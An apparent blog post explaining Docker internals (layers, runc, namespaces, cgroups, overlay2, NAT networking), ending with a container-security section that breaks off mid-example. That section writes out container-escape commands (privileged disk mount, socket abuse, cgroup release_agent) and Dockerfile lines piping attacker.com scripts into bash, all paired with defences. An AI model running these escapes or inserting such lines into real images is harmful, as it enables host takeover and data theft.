Most developers treat Docker as a black box — you write a Dockerfile, run docker run, and things just work. But what's actually happening under the hood? This post pulls back the curtain and walks through every layer: from the CLI all the way down to the Linux kernel primitives that make isolation possible.
Table of Contents
- The Big Picture
- The Docker CLI and Client
- The Docker Daemon (dockerd)
- Images: Layered Filesystems
- The Container Runtime: containerd and runc
- Linux Namespaces: Isolation
- cgroups: Resource Control
- Union Filesystems and Storage Drivers
- Networking Internals
- The Full Lifecycle: Start to Finish
- Security Surface and Attack Vectors
- Docker vs. Podman vs. nerdctl vs. Kata Containers
- Summary and Key Takeaways
1. The Big Picture
Before we descend into internals, it helps to have a map. Docker is not a single program — it's a stack of cooperating components. Each layer has a distinct job.
Every docker run command you've ever typed travels through this entire stack. Let's walk it top to bottom.
2. The Docker CLI and Client
The docker command you type in your terminal is just a client. It does almost nothing by itself — it serializes your intent into REST API calls and forwards them to the daemon.
Key facts about the CLI:
- Communication happens over a Unix domain socket (/var/run/docker.sock), not TCP, for local interactions. This is why Docker commands feel instantaneous — there's no network round-trip.
- The CLI speaks the Docker Engine API (a versioned REST API). You can call it directly with curl if you want: curl --unix-socket /var/run/docker.sock http://localhost/images/json.
- The CLI is open source and replaceable. Tools like Podman, Buildx, and Docker Compose are all just different clients talking to compatible backends.
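To see this for yourself, here's a small sketch of querying the Engine API over the socket with nothing but curl (you need read access to /var/run/docker.sock; the version prefix is optional, and 1.43 is just an illustrative API version):

# Ask the daemon for its version and the list of running containers
curl --unix-socket /var/run/docker.sock http://localhost/version
curl --unix-socket /var/run/docker.sock http://localhost/v1.43/containers/json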
3. The Docker Daemon (dockerd)
The daemon is the brain. It's a long-running background process that manages the entire lifecycle of containers, images, volumes, and networks.
The daemon doesn't actually run containers itself anymore. That's a critical architectural decision made in 2017 — Docker extracted the container runtime into containerd (see Section 5). The daemon now acts as an orchestrator sitting above containerd, handling the higher-level logic like image pulls, build context, log streaming, and networking setup.
4. Images: Layered Filesystems
A Docker image is not a single monolithic file. It's a stack of read-only layers, each representing a single filesystem change made by a Dockerfile instruction. This is the foundation of Docker's efficiency.
4.1 How Layers Are Built
Each instruction in a Dockerfile that modifies the filesystem creates a new layer:
FROM ubuntu:22.04 # Layer 0: Base image (multiple layers itself)
RUN apt-get update # Layer 1: Updated package index
RUN apt-get install -y nginx # Layer 2: Nginx binaries + deps
COPY ./app /opt/app # Layer 3: Your application code
CMD ["nginx", "-g", "daemon off;"] # Metadata only — no new layer
4.2 Layer Sharing and The Content-Addressable Store
Every layer is identified by the SHA-256 hash of its contents. This gives Docker two powerful properties:
Deduplication: If two images share the same ubuntu:22.04 base, the layers on disk are stored only once. The hash is the same, so Docker knows they're identical.
Shared caching: When you rebuild an image and only change Layer 3, Docker reuses Layers 0–2 from cache. It only needs to rebuild from the point of change.
Suppose you build two versions of an image, v1 and v2, that differ only in the application code. They share the first three layers (ubuntu base, apt-get update, nginx install); only the final layer differs (app v1 vs. app v2). This is why docker pull is so fast for incremental updates — it only fetches the delta.
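You can watch both properties in action with two everyday commands (image and tag names here are just examples):

# Show the layer stack and which Dockerfile instruction created each layer
docker history nginx:latest
# Rebuild after changing only your app code: unchanged layers are served from cache (BuildKit prints CACHED)
docker build -t my-app .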
4.3 The OCI Image Manifest
When you pull an image, what actually comes over the wire is an OCI Image Manifest — a JSON document that lists all the layers, their hashes, and the image config:
{
"schemaVersion": 2,
"mediaType": "application/vnd.oci.image.manifest.v1+json",
"config": {
"mediaType": "application/vnd.oci.image.config.v1+json",
"digest": "sha256:aaa...",
"size": 7023
},
"layers": [
{ "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"digest": "sha256:abc1...", "size": 73400320 },
{ "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"digest": "sha256:def2...", "size": 15728640 },
{ "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"digest": "sha256:ghi3...", "size": 47185920 },
{ "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip",
"digest": "sha256:jkl4...", "size": 5242880 }
]
}
The config blob contains the runtime metadata: environment variables, the entrypoint command, exposed ports, working directory, and the history of how each layer was built.
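If you want to look at a manifest yourself without pulling the image, docker manifest inspect fetches it from the registry (many popular images return a multi-arch index first, which points at per-platform manifests like the one above):

docker manifest inspect nginx:latest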
5. The Container Runtime: containerd and runc
This is where Docker hands off actual container creation to the Linux kernel. The runtime stack has two tiers.
containerd (High-Level Runtime)
containerd is a daemon that manages the lifecycle of containers at a level just above the kernel. It's responsible for:
- Pulling and unpacking images into snapshots on disk
- Managing snapshots via the storage driver (e.g., overlay2)
- Invoking runc to actually create and start containers
- Exposing a gRPC API that dockerd (and Kubernetes, via the CRI interface) uses
containerd is a CNCF graduated project — it's the same runtime Kubernetes uses under the hood. This is why you can swap Docker for containerd directly in production clusters.
runc (Low-Level Runtime)
runc is a tiny (~5MB) binary that does the actual heavy lifting of talking to the kernel. When you ask for a new container, runc does the following in sequence:
1. Reads the OCI runtime spec — a config.json generated by containerd that describes the desired container state
2. Calls clone() with namespace flags — this is the single syscall that creates a new process inside isolated namespaces
3. Sets up cgroups — attaches the new process to resource-limiting control groups
4. Mounts the filesystem — sets up the overlay filesystem, bind mounts, and the /proc and /sys pseudo-filesystems
5. Drops privileges — removes capabilities the container doesn't need
6. Execs the entrypoint — replaces itself with PID 1 inside the container
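You can drive runc by hand to watch this handoff. A minimal sketch, assuming you have a root filesystem unpacked somewhere (for example via docker export):

mkdir -p /tmp/mycontainer/rootfs   # unpack an exported image filesystem here
cd /tmp/mycontainer
runc spec                          # writes a default OCI config.json next to rootfs/
sudo runc run mycontainer          # clone() with namespace flags, cgroups, mounts, then execve()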
6. Linux Namespaces: Isolation
Namespaces are the kernel feature that makes containers feel like separate machines. Each namespace type isolates a different aspect of the OS. A container typically lives inside seven namespaces simultaneously.
Namespace Breakdown
| Namespace | Isolates | What Happens Inside the Container |
|---|---|---|
| PID | Process IDs | Container's first process is always PID 1. It can't see or signal host processes. |
| NET | Network interfaces, routing tables, iptables | Container gets its own virtual NIC, its own IP, its own loopback. |
| MNT | Mount points | Container has its own filesystem tree. Host mounts are invisible. |
| UTS | Hostname & domain name | hostname returns the container's name, not the host's. |
| IPC | Inter-process communication (shared memory, semaphores, message queues) | Containers can't read each other's /dev/shm. |
| USER | User and group IDs | Maps container's root (UID 0) to an unprivileged host UID. Critical for security. |
| CGROUP | cgroup hierarchy view | Container sees only its own cgroup subtree, so it can't inspect resource limits of sibling containers. |
The PID namespace is particularly elegant. When PID 1 inside a container exits, the entire container stops — just like how killing PID 1 on a real Linux machine shuts everything down. This is why your entrypoint process matters so much.
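You can inspect these namespaces from the host. A sketch, assuming a running container named my-container:

# Find the container's PID on the host, then list the namespaces it lives in
PID=$(docker inspect --format '{{.State.Pid}}' my-container)
ls -l /proc/$PID/ns      # one symlink per namespace type (pid, net, mnt, uts, ipc, user, cgroup)
sudo lsns -p $PID        # the same view via util-linux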
7. cgroups: Resource Control
While namespaces provide isolation (what you can see), cgroups provide control (what you can use). cgroups (control groups) are a Linux kernel feature that lets you partition system resources among processes.
Docker uses cgroups v2 (the unified hierarchy) on modern systems.
How Docker Maps Your Flags to cgroups
When you run:
docker run --cpus=0.5 --memory=512m --pids-limit=50 my-app
Docker translates these into cgroup filesystem writes:
| Docker Flag | cgroup File | Value Written |
|---|---|---|
| --cpus=0.5 | cpu.max | 50000 100000 (50ms per 100ms period) |
| --memory=512m | memory.max | 536870912 (bytes) |
| --memory-swap=0 | memory.swap.max | 0 |
| --pids-limit=50 | pids.max | 50 |
| --blkio-weight=100 | io.weight | 100 |
The kernel enforces these limits. If a container tries to allocate more memory than memory.max, the kernel's OOM killer kicks in and terminates the offending process. The container doesn't crash silently — it gets a 137 (SIGKILL) exit code.
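You can verify what the kernel enforces by reading the cgroup files directly. A sketch, assuming a systemd host where Docker places containers under system.slice (the exact path varies by distro and cgroup driver):

CID=$(docker run -d --cpus=0.5 --memory=512m --pids-limit=50 nginx)
cat /sys/fs/cgroup/system.slice/docker-$CID.scope/cpu.max     # 50000 100000
cat /sys/fs/cgroup/system.slice/docker-$CID.scope/memory.max  # 536870912
cat /sys/fs/cgroup/system.slice/docker-$CID.scope/pids.max    # 50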
8. Union Filesystems and Storage Drivers
Here's the problem: Docker images are read-only (they're just layers stacked on top of each other), but containers need to write files (logs, temp files, config changes). How do you let a container modify files without breaking the original image?
The solution is overlay2 — think of it like transparent sheets stacked on top of each other.
8.1 The Transparent Sheets Analogy
Imagine you have a stack of transparent sheets:
- Bottom sheets (read-only): These are the Docker image layers. They contain /bin/bash, /usr/sbin/nginx, etc. You can look through them but you can't write on them.
- Top sheet (writable): This is created fresh for each container. When you start a container, Docker puts a blank writable sheet on top.
When you look down from above, you see all the sheets merged together — this is what the container sees as its filesystem (/).
8.2 Four Scenarios: Read, Modify, Create, Delete
Let's walk through what happens when a container interacts with files:
Scenario 1: Reading an existing file
# Inside the container
cat /bin/bash
- The file exists in the lower (image) layers
- overlay2 reads it directly from there
- No copying, instant access
- Multiple containers reading the same file? They all read the same disk blocks — zero duplication
Scenario 2: Modifying an existing file
# Inside the container
echo "listen 8080;" >> /etc/nginx/nginx.conf
Here's where copy-on-write happens:
- First: The file /etc/nginx/nginx.conf exists in the lower (image) layer
- Container tries to write: overlay2 intercepts this
- Copy the entire file up: The whole file gets copied from the lower layer to the upper (writable) layer
- Modify the copy: The container writes to the copy in the upper layer
- Future reads: The container now sees the modified version (upper layer wins)
The original file in the lower layer is never touched — it stays pristine. When you stop and delete the container, the upper layer is destroyed. The image is unchanged.
Scenario 3: Creating a new file
# Inside the container
echo "Hello" > /opt/app/new-file.txt
- This file doesn't exist in the image layers
- It's created directly in the upper (writable) layer
- Only this container sees it
- When the container is deleted, the file vanishes
Scenario 4: Deleting a file that exists in the image
# Inside the container
rm /etc/old-config
- The file exists in the lower (image) layer — you can't actually delete it (it's read-only)
- Instead, overlay2 creates a special whiteout file in the upper layer: .wh.old-config
- When the kernel sees the whiteout file, it hides the original file from the lower layer
- The container thinks the file is deleted, but it still exists in the image layer
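docker diff makes all four scenarios visible: it lists exactly what landed in a container's upper layer (A = added, C = changed, D = deleted). A quick sketch:

docker run --name demo ubuntu:22.04 bash -c 'echo hi > /new.txt && rm /etc/legal'
docker diff demo
# A /new.txt     (created in the upper layer)
# D /etc/legal   (whiteout file in the upper layer)
# C /etc         (parent directory metadata changed)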
8.3 Why This Matters
This design gives Docker three critical properties:
1. Disk efficiency: Starting 100 containers from the same image uses almost zero extra disk space initially. They all share the same read-only image layers. Only the writable upper layer (which starts empty) is unique per container.
2. Fast startup: No need to copy the entire filesystem — just create an empty upper layer and you're ready to go.
3. Image immutability: The original image layers are never modified. You can run a container, mess it up completely, delete it, and start fresh from the exact same image — nothing is corrupted.
8.4 The Full Picture
Here's how overlay2 actually mounts the filesystem:
# Simplified version of what Docker does behind the scenes
mount -t overlay overlay \
-o lowerdir=/var/lib/docker/overlay2/l/LAYER1:/var/lib/docker/overlay2/l/LAYER2 \
-o upperdir=/var/lib/docker/overlay2/abc123/diff \
-o workdir=/var/lib/docker/overlay2/abc123/work \
/var/lib/docker/overlay2/abc123/merged
- lowerdir: The read-only image layers (colon-separated list)
- upperdir: The writable layer for this specific container
- workdir: Temporary scratch space overlay2 uses internally (you can ignore this)
- merged: Where the unified view appears — this is what the container sees as /
When the container is deleted, Docker just removes the upperdir and workdir directories. The lowerdir (image layers) stay intact and can be reused immediately for the next container.
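Both halves of this are easy to see on a live host (my-container is a placeholder name):

# Where are this container's merged view and writable layer?
docker inspect --format '{{.GraphDriver.Data.MergedDir}}' my-container
docker inspect --format '{{.GraphDriver.Data.UpperDir}}' my-container
# The kernel's view: every overlay mount with its lowerdir/upperdir/workdir options
mount -t overlay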
9. Networking Internals
Docker containers are isolated in their own network namespace — they have their own network stack, their own IP address, their own routing table. But how does traffic from the outside world reach them? And how do containers talk to each other?
The answer involves four key components working together like a postal system.
9.1 The Four Components
Think of Docker networking like a building's internal mail system:
- veth pairs — Virtual cables connecting the container to the host (like a mail slot in each apartment door)
- docker0 bridge — A virtual network switch that connects all containers (like the building's mailroom)
- iptables DNAT — Rewrites destination addresses for incoming packets (like the front desk forwarding mail to apartments)
- iptables SNAT — Rewrites source addresses for outgoing packets (like the building's return address on all outgoing mail)
9.2 The Big Picture: How Traffic Flows
Let's trace what happens when someone accesses your containerized nginx server started with docker run -p 8080:80 nginx.
9.3 Step-by-Step: What Happens with -p 8080:80
Let's break down the journey of a single HTTP request step by step.
Setup (happens once at container start):
When you run docker run -p 8080:80 nginx, Docker does this:
1. Creates a veth pair — Two virtual network interfaces connected like a pipe. One end (veth1a2b3c) stays on the host, the other (eth0) goes into the container's network namespace.
2. Attaches the host end to docker0 — The docker0 bridge is a virtual Layer 2 switch. All container veth pairs plug into it, like devices plugged into a physical switch.
3. Assigns an IP to the container — The container's eth0 gets an IP from the bridge's subnet, usually 172.17.0.2/16. The bridge itself is 172.17.0.1.
4. Adds iptables rules:
   - DNAT rule (PREROUTING chain): "If a packet arrives at port 8080, rewrite its destination to 172.17.0.2:80"
   - SNAT rule (POSTROUTING chain): "If a packet from 172.17.0.0/16 is leaving the host, rewrite its source to the host's IP"
Request path (inbound traffic):
Now someone visits http://192.168.1.10:8080 from the internet:
① Packet arrives at host NIC
Source: 203.0.113.5:54321 (external client)
Destination: 192.168.1.10:8080 (host's public IP and exposed port)
② iptables DNAT rewrites destination
The PREROUTING rule fires:
-A PREROUTING -p tcp --dport 8080 -j DNAT --to-destination 172.17.0.2:80
Packet becomes:
Source: 203.0.113.5:54321 (unchanged)
Destination: 172.17.0.2:80 (container's IP and port)
③ Packet routed to docker0 bridge
The kernel's routing table sees destination 172.17.0.2 is on the docker0 subnet. It forwards the packet to the bridge.
④ Bridge forwards to correct veth
The bridge has learned which container has IP 172.17.0.2 (via ARP). It forwards the packet out the correct veth pair.
⑤ Packet arrives at container's eth0
Inside the container's network namespace, nginx sees:
Incoming connection from 203.0.113.5:54321 to 172.17.0.2:80
Nginx processes the request and sends a response.
Response path (outbound traffic):
⑥ Response leaves container
Source: 172.17.0.2:80 (container)
Destination: 203.0.113.5:54321 (original client)
⑦ Packet crosses veth pair to bridge
The container's default gateway is 172.17.0.1 (the bridge). Packet goes back through the veth pair to the host.
⑧ Source address rewritten on the way out
For container-initiated outbound connections, Docker's POSTROUTING rule applies MASQUERADE:
-A POSTROUTING -s 172.17.0.0/16 ! -o docker0 -j MASQUERADE
This rule means: "For any packet from the 172.17.0.0/16 subnet (the docker0 bridge network)
that's NOT going out the docker0 interface (! -o docker0), rewrite its source to the host's IP"
Our response packet is subtly different: it belongs to a connection conntrack already knows about (it was DNATed on the way in), so the kernel reverses that translation instead of evaluating the NAT rules again.
Packet becomes:
Source: 192.168.1.10:8080 (the endpoint the client originally contacted)
Destination: 203.0.113.5:54321 (unchanged)
What is 172.17.0.0/16? This is subnet notation (CIDR) representing the entire IP range that docker0 manages:
- 172.17.0.1 — docker0 bridge (gateway)
- 172.17.0.2 — Our container
- 172.17.0.3–172.17.255.254 — Other possible container IPs
- 172.17.0.0/16 — The whole subnet (all of the above)
Why rewrite the source at all? The external client sent the request to 192.168.1.10:8080. If the response came back from 172.17.0.2:80 (a private IP it has never heard of), the client's TCP stack would drop it as unsolicited traffic. Reversing the NAT makes the response appear to come from the endpoint the client actually contacted.
The kernel maintains a connection tracking table (conntrack) that remembers:
- Inbound: Client's packet to 192.168.1.10:8080 was DNATed to 172.17.0.2:80
- Outbound: Container's response from 172.17.0.2:80 has its source rewritten back to 192.168.1.10:8080
When the response packet reaches the client, conntrack ensures the client sees it as coming from the same endpoint it originally contacted (192.168.1.10:8080), making the whole exchange appear as a normal TCP connection.
⑨ Response sent to client
From the client's perspective, it had a normal TCP conversation with 192.168.1.10:8080. It has no idea a container was involved.
9.4 Container-to-Container Communication
When two containers on the same host talk to each other, it's much simpler — no NAT required:
- Container A sends a packet to 172.17.0.3 (Container B's IP)
- The packet goes through A's veth pair to the docker0 bridge
- The bridge sees the destination MAC address (learned via ARP) and forwards directly to B's veth pair
- Packet arrives at Container B — no address translation needed
This is why containers on the same user-defined Docker network can talk to each other using their container names as hostnames — Docker runs an embedded DNS server that resolves container names to their bridge IPs. (The default docker0 bridge does not get this name resolution.)
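A quick demonstration, assuming nothing but stock Docker (the names app-net and web are arbitrary):

docker network create app-net
docker run -d --name web --network app-net nginx
docker run --rm --network app-net alpine ping -c 1 web   # name resolved by the embedded DNS at 127.0.0.11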
9.5 Why This Design?
This architecture gives Docker:
Isolation: Each container has its own network stack. One container can't sniff traffic from another (different network namespaces).
Portability: Containers always see themselves with the same internal IP (e.g., 172.17.0.2), regardless of what host IP they're running on.
Flexibility: You can expose different host ports (8080, 8081, 8082) all pointing to the same container port (80), allowing multiple containers to run the same service.
Performance: Container-to-container traffic never leaves the host — it's just a memory copy through the bridge. No network stack overhead.
The docker0 bridge is created automatically when Docker starts. You can see it with ip addr show docker0 on the host. Every running container gets a veth pair, and brctl show docker0 will list all the attached interfaces.
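All of the moving parts from this section can be inspected with standard tools (interface names and rule sets vary per host):

ip addr show docker0          # the bridge and its 172.17.0.1/16 gateway address
ip link | grep veth           # host-side ends of the veth pairs
sudo iptables -t nat -L -n    # the DNAT/MASQUERADE rules Docker installed
sudo conntrack -L | grep 172.17   # live NAT translations (conntrack-tools package)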
10. The Full Lifecycle: Start to Finish
Now let's put it all together. When you type docker run -p 8080:80 nginx, what actually happens? The answer involves five distinct phases, each handled by a different part of the stack.
10.1 The Five Phases
10.2 Phase-by-Phase Breakdown
Let's trace exactly what each component does.
Phase 1: Image Resolution (dockerd → Registry)
You: docker run -p 8080:80 nginx
CLI: Sends REST API call to dockerd
dockerd: "Do I have nginx:latest locally?"
→ Check local image cache
→ Missing! Need to pull from registry
dockerd → Registry: GET /v2/library/nginx/manifests/latest
Registry → dockerd: Here's the OCI manifest with 6 layer digests
dockerd: "Which layers do I already have?"
→ Check: sha256:abc123... ✅ (have it - ubuntu base)
→ Check: sha256:def456... ❌ (missing)
→ Check: sha256:789abc... ❌ (missing)
dockerd → Registry: GET /v2/library/nginx/blobs/sha256:def456...
Registry → dockerd: [compressed layer tarball]
dockerd: Unpacks layers to /var/lib/docker/overlay2/
→ Verifies SHA-256 checksums
→ Decompresses tarballs
→ Stores in content-addressable storage
Phase 2: Container Setup (dockerd → containerd)
dockerd → containerd: "Create a container from nginx:latest"
Here's the config: { Image: "nginx", Ports: {"80/tcp": {}} }
containerd: Generates OCI runtime specification (config.json):
{
"root": { "path": "/path/to/overlay2/merged" },
"process": { "args": ["nginx", "-g", "daemon off;"] },
"linux": {
"namespaces": [
{ "type": "pid" }, { "type": "network" }, ...
],
"resources": { "memory": { "limit": -1 } }
}
}
containerd: Prepares overlay2 mount:
- lowerdir: nginx image layers (read-only)
- upperdir: /var/lib/docker/overlay2/abc123/diff (writable)
- workdir: /var/lib/docker/overlay2/abc123/work
- merged: /var/lib/docker/overlay2/abc123/merged (what container sees)
containerd → runc: "Create container with this config.json"
Phase 3: Kernel-Level Isolation (runc → Linux Kernel)
runc: Reads config.json
→ Time to talk to the kernel
runc → kernel: clone(CLONE_NEWPID | CLONE_NEWNET | CLONE_NEWNS |
CLONE_NEWUTS | CLONE_NEWIPC | CLONE_NEWUSER |
CLONE_NEWCGROUP)
"Create a new process with 7 isolated namespaces"
kernel: Creates namespace structures
→ New PID namespace: container's processes start at PID 1
→ New NET namespace: empty network stack
→ New MNT namespace: isolated filesystem view
→ (and 4 others...)
runc → kernel: Write cgroup limits to /sys/fs/cgroup/
- cpu.max = max 100000 (no limit)
- memory.max = 536870912 (512 MiB)
- pids.max = unlimited
runc → kernel: mount("overlay", "/var/lib/docker/overlay2/abc123/merged", ...)
"Mount the overlay filesystem as the container's root"
runc → kernel: mount("proc", "/proc", "proc")
mount("sysfs", "/sys", "sysfs")
"Mount pseudo-filesystems inside container"
runc → kernel: prctl(PR_CAPBSET_DROP, CAP_SYS_ADMIN)
"Drop dangerous capabilities - container can't break out"
Phase 4: Networking (dockerd → Linux Kernel)
dockerd: "Container created, now set up networking"
dockerd → kernel: ip link add veth0 type veth peer name veth1a2b3c
"Create a virtual ethernet cable (veth pair)"
dockerd → kernel: ip link set veth1a2b3c master docker0
"Plug host-end into the docker0 bridge"
dockerd → kernel: ip link set veth0 netns <container-pid>
"Move container-end into container's network namespace"
dockerd → kernel: (inside container namespace)
ip addr add 172.17.0.2/16 dev veth0
ip link set veth0 up
ip route add default via 172.17.0.1
"Configure container's network: IP, gateway, routes"
dockerd → kernel: iptables -t nat -A PREROUTING -p tcp --dport 8080 \
-j DNAT --to-destination 172.17.0.2:80
"Add port forwarding rule: 8080 → container:80"
dockerd → kernel: iptables -t nat -A POSTROUTING -s 172.17.0.0/16 \
! -o docker0 -j MASQUERADE
"Add SNAT rule for outbound traffic"
Phase 5: Process Launch (runc → Container)
runc: Everything is ready - namespaces, cgroups, filesystem, network
→ Time to start the actual application
runc → kernel: execve("/usr/sbin/nginx", ["nginx", "-g", "daemon off;"])
"Replace this process with nginx"
kernel: Inside the container:
→ PID 1 is now nginx (not init!)
→ Sees only its own process tree
→ Sees only its own network interfaces (eth0 = 172.17.0.2)
→ Sees only its own filesystem (overlayfs merged view)
nginx: Starts listening on 0.0.0.0:80 (inside the container)
nginx → kernel: bind(sockfd, { 0.0.0.0:80 })
kernel: "Bound to port 80 in this network namespace"
runc → containerd: "Container is running, PID 1 active"
containerd → dockerd: "Container abc123 status: running"
dockerd → CLI: { "Id": "abc123...", "Status": "running" }
CLI → You: abc123def456...
10.3 The Complete Timeline
Here's how fast it all happens:
| Time | What's Happening |
|---|---|
| 0ms | You press Enter on docker run |
| 5ms | CLI sends REST call to dockerd |
| 10-200ms | Phase 1: Image pull (if needed) - can be ~0ms if cached |
| 210ms | Phase 2: containerd generates config |
| 220ms | Phase 3: runc creates namespaces & cgroups |
| 240ms | Phase 4: Network setup (veth, bridge, iptables) |
| 250ms | Phase 5: execve("nginx") - PID 1 starts |
| 270ms | nginx binds to port 80 |
| 300ms | nginx is serving traffic |
| ~500ms | Total time (cold start with image pull) |
If the image is already cached, total startup drops to ~100ms — just the namespace creation and process launch.
Compare this to a VM:
- Boot time: 20-60 seconds
- Memory overhead: 512MB minimum for guest OS
- Disk overhead: Full OS image (1-10GB)
Docker's speed comes from not booting an OS. It's just process isolation with namespace boundaries — the kernel is already running.
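It's easy to measure on your own machine. A rough sketch (numbers vary wildly with hardware and image size):

docker pull alpine >/dev/null      # warm the image cache first
time docker run --rm alpine true   # end-to-end: namespaces, cgroups, overlay mount, execve, teardown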
11. Security Surface and Attack Vectors
Understanding internals means understanding where things can go wrong. The container boundary is enforced by kernel features, not by a hypervisor. This is both Docker's strength (speed, efficiency) and its weakness (shared kernel = shared attack surface).
Every security discussion about containers comes down to one fundamental question: What happens if a malicious process inside a container tries to break out?
11.1 The Threat Landscape
The security model is defense in depth — multiple layers that must all be bypassed for a successful container escape.
11.2 Attack Vector 1: Privileged Mode (--privileged)
What it is:
docker run --privileged malicious-image
What it does: Disables every single security boundary we've discussed:
- ✅ Namespaces still exist, but capabilities are not dropped
- ✅ cgroups still limit resources, but not access
- ❌ All capabilities granted (CAP_SYS_ADMIN, CAP_NET_ADMIN, etc.)
- ❌ /dev is fully exposed (block devices, hardware)
- ❌ seccomp disabled
- ❌ AppArmor/SELinux disabled
The attack:
# Inside a privileged container
mkdir /mnt/host
mount /dev/sda1 /mnt/host # Mount the host's root filesystem
chroot /mnt/host # Change root to host filesystem
# You're now effectively root on the host
cat /etc/shadow # Read host passwords
Why it works: With CAP_SYS_ADMIN and full /dev access, the attacker can mount the host's block devices and access the entire filesystem. The namespace boundary becomes meaningless.
Defense: Never use --privileged in production. If you need specific capabilities (e.g., CAP_NET_ADMIN for network tools), grant them individually:
docker run --cap-add=NET_ADMIN --cap-drop=ALL my-image
11.3 Attack Vector 2: Kernel Vulnerabilities (Shared Kernel)
The fundamental problem: All containers share the host's kernel. A kernel exploit in one container = full host compromise.
Real-world example: CVE-2019-5736 (runc escape)
This was a critical vulnerability in runc itself. Here's how it worked:
# Attacker prepares a malicious container entrypoint
# The entrypoint overwrites /proc/self/exe (which points to runc on the host)
# When the container starts:
# 1. dockerd calls runc to launch the container
# 2. runc forks and execs the container's entrypoint
# 3. The malicious entrypoint overwrites /proc/self/exe
# 4. Because /proc/self/exe is a symlink to the runc binary on the host...
# 5. The attacker has now overwritten the host's runc binary
# 6. Next time anyone runs 'docker exec', the malicious runc executes on the host
Why it works: /proc/self/exe is a special symlink that points to the currently executing binary. For runc, this points to the host's /usr/bin/runc. Because the attacker had write access to this symlink from inside the container, they could overwrite the host binary.
Defense mechanisms:
1. seccomp profiles — Whitelist only the syscalls the container actually needs:
{
"defaultAction": "SCMP_ACT_ERRNO",
"syscalls": [
{ "names": ["read", "write", "open", "close", "stat"], "action": "SCMP_ACT_ALLOW" },
{ "names": ["mount", "ptrace", "reboot"], "action": "SCMP_ACT_ERRNO" }
]
}
Docker's default seccomp profile blocks ~44 dangerous syscalls including:
- mount / umount
- reboot / sethostname
- ptrace (process tracing)
- keyctl (kernel key management)
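Applying a profile is a single flag. A sketch, assuming the JSON above is saved as profile.json (a whitelist that small would break most real workloads; it's illustrative):

docker run --security-opt seccomp=profile.json my-image
# compare against the default profile, or (never in production) disable seccomp entirely:
docker run --security-opt seccomp=unconfined my-image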
2. Keep kernel & runtime updated: CVE-2019-5736 was patched in runc 1.0-rc7. The fix: runc now re-executes itself from a sealed, read-only in-memory copy of its own binary, so /proc/self/exe can no longer reach the host's runc.
11.4 Attack Vector 3: Mounted Docker Socket
What it is:
docker run -v /var/run/docker.sock:/var/run/docker.sock attacker-image
What it does: Gives the container full control over the Docker daemon.
The attack:
# Inside the container with the socket mounted
apk add docker-cli # Install Docker CLI inside container
# Now the attacker can create their own privileged container
docker run -v /:/host --privileged -it alpine sh
# This new container has:
# - Full access to host filesystem (mounted at /host)
# - --privileged mode (all capabilities)
# - Running as root on the host
Why it works: The Docker socket is the control plane. Anyone who can write to /var/run/docker.sock can instruct the daemon to create containers with arbitrary configurations — including privileged containers, bind mounts of the host filesystem, and more.
Defense:
- Never mount the Docker socket into untrusted containers
- If you must (e.g., for tools like Portainer or Traefik that need the Docker API), use socket proxies that filter allowed API calls:
# Use tecnativa/docker-socket-proxy to restrict allowed operations
docker run -v /var/run/docker.sock:/var/run/docker.sock \
-e CONTAINERS=1 -e POST=0 \
tecnativa/docker-socket-proxy
11.5 Attack Vector 4: Dangerous Capabilities
Linux capabilities break down root's powers into ~40 distinct privileges. By default, Docker drops most of them, but some workloads require specific capabilities back.
Dangerous capabilities:
CAP_SYS_ADMIN — The "god mode" capability. Allows:
- Mounting filesystems
- Creating namespaces
- Loading kernel modules
- Basically everything that defines "root"
Attack with CAP_SYS_ADMIN:
# Container started with --cap-add=SYS_ADMIN (classic cgroup v1 escape)
mkdir /mnt/cgroup
mount -t cgroup -o memory memory /mnt/cgroup
mkdir /mnt/cgroup/x && echo 1 > /mnt/cgroup/x/notify_on_release
# release_agent must be a path valid on the HOST (e.g., this container's overlay upperdir)
echo /path/on/host/payload.sh > /mnt/cgroup/release_agent
# when the last process leaves cgroup x, the host kernel runs payload.sh as root
CAP_SYS_PTRACE — Allows attaching to any process:
# Attach to dockerd or another container's PID 1
gdb -p <dockerd-pid>
# Inject shellcode, steal secrets, modify memory
CAP_NET_ADMIN — Network configuration:
# Create network namespaces, sniff traffic
ip netns add attacker
# Modify iptables rules
iptables -F # Flush all rules
Defense:
# Start with nothing, add only what's needed
docker run --cap-drop=ALL --cap-add=NET_BIND_SERVICE my-image
# Audit what capabilities your containers actually use
docker inspect <container> | jq '.[].HostConfig.CapAdd'
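You can also check the capability set from inside a container; every process exposes its capabilities in /proc:

docker run --rm alpine grep Cap /proc/1/status
# CapEff is the effective set as a bitmask; decode whatever value you see with:
# capsh --decode=<mask>   (from the libcap package)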
11.6 Attack Vector 5: Supply Chain (Compromised Images)
The scenario: You run docker pull nginx and execute code you've never audited.
What could go wrong:
Backdoored base images:
# Looks innocent
FROM ubuntu:22.04
RUN apt-get update && apt-get install -y nginx
# But the Dockerfile also did this:
RUN curl http://attacker.com/backdoor.sh | bash
RUN echo "* * * * * curl http://attacker.com/exfil.sh | bash" > /etc/cron.d/exfil
Crypto miners: Many compromised images quietly mine cryptocurrency, consuming CPU that you pay for in cloud bills.
Data exfiltration: The container can read environment variables (docker run -e DATABASE_PASSWORD=secret), mounted volumes, and make outbound network connections.
Defense layers:
1. Image scanning: Scan for known CVEs before running:
# Using Trivy (open source)
trivy image nginx:latest
# Example output:
# nginx:latest (ubuntu 22.04)
# Total: 24 (CRITICAL: 2, HIGH: 8, MEDIUM: 14)
# CVE-2023-1234 | CRITICAL | openssl | 3.0.2-0ubuntu1 | Buffer overflow
2. Content trust / image signing:
# Enable Docker Content Trust
export DOCKER_CONTENT_TRUST=1
# Only pull images signed with trusted keys
docker pull nginx:latest
# Error: No trust data for latest
3. Use distroless or minimal base images:
# Instead of ubuntu (72MB with shell, package manager, etc.)
FROM gcr.io/distroless/base-debian11 # 20MB, no shell, no package manager
COPY my-app /app
CMD ["/app"]
Why? No shell = attacker can't run curl | bash even if they compromise the app.
4. Run as non-root user:
FROM ubuntu:22.04
RUN useradd -u 1001 -m appuser
USER appuser
CMD ["./my-app"]
Now if the app is compromised, the attacker is UID 1001, not root.
11.7 Defense in Depth: How the Layers Work Together
Here's a concrete example of how multiple defenses stop an attack:
Scenario: An attacker exploits an RCE vulnerability in your web app running in a container.
Step 1: Attacker gets code execution inside container
→ They're running as UID 1001 (non-root user)
Step 2: Attacker tries: mount /dev/sda1 /mnt
